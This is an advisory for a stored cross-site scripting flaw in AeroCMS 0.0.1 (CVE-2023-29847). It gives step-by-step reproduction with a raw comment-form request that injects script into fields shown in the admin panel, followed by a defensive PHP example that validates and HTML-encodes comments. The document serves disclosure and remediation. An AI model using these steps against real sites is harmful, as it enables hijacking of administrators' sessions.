# Exploit Title: AeroCMS v0.0.1 - Stored Cross-Site Scripting (XSS)
# Date: 2023-03-14
# Exploit Author: Rahad Chowdhury
# Vendor Homepage: https://github.com/MegaTKC/AeroCMS
# Software Link: https://github.com/MegaTKC/AeroCMS/archive/refs/tags/v0.0.1.zip
# Version: 0.0.1
# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53
# CVE: CVE-2023-29847
Steps to Reproduce:
1. Open any post.
2. Fill in the comment section and submit it. Your request data will be:

POST /AeroCMS/post.php?p_id=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
Origin: http://127.0.0.1
Cookie: PHPSESSID=qtj8dhp0jub18i2agkfm4bf5ea
Connection: close

comment_author=test&comment_email=test@test.com&comment_content=test&create_comment=

3. The "comment_author" and "comment_content" parameters are vulnerable. Use any XSS payload in the "comment_author" and "comment_content" parameters.
4. Now log in to the admin panel and go to the "Comments" menu.
5. You will see the XSS pop-up. (If the admin approves the comment, the XSS pop-up executes in the post section.)
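
One way to close this on the server side, shown as an added example that is not AeroCMS's own code or the exploit author's: validate the comment fields on input and HTML-encode "comment_author" and "comment_content" wherever they are rendered, both in the post view and in the admin "Comments" list. The function names, length limits and HTML layout are assumptions made for the example.

```php
<?php
declare(strict_types=1);

// Encode a stored value for an HTML text or quoted-attribute context.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Validate the three comment fields from the request shown above.
// The byte-length limits are assumptions chosen for this example.
function validate_comment(array $post): array
{
    $author  = trim((string)($post['comment_author'] ?? ''));
    $email   = trim((string)($post['comment_email'] ?? ''));
    $content = trim((string)($post['comment_content'] ?? ''));

    $errors = [];
    if ($author === '' || strlen($author) > 64) {
        $errors[] = 'comment_author';
    }
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        $errors[] = 'comment_email';
    }
    if ($content === '' || strlen($content) > 2000) {
        $errors[] = 'comment_content';
    }
    return [$errors, compact('author', 'email', 'content')];
}

// Render one stored comment. Every field is encoded at output time, so
// markup saved before the fix is also displayed as inert text.
function render_comment(array $c): string
{
    return '<div class="comment"><h4>' . e($c['author']) . '</h4>'
         . '<p>' . nl2br(e($c['content'])) . '</p></div>';
}

// Constructed sample input: markup characters only, no script.
$post = [
    'comment_author'  => '<b>test</b>',
    'comment_email'   => 'test@test.com',
    'comment_content' => "line one & \"quoted\"\n<i>line two</i>",
];
[$errors, $comment] = validate_comment($post);
echo $errors ? 'rejected: ' . implode(', ', $errors) : render_comment($comment), PHP_EOL;
```

Encoding at output rather than stripping tags at input keeps the stored data unchanged and covers every page that prints a comment, including the admin panel view from step 4.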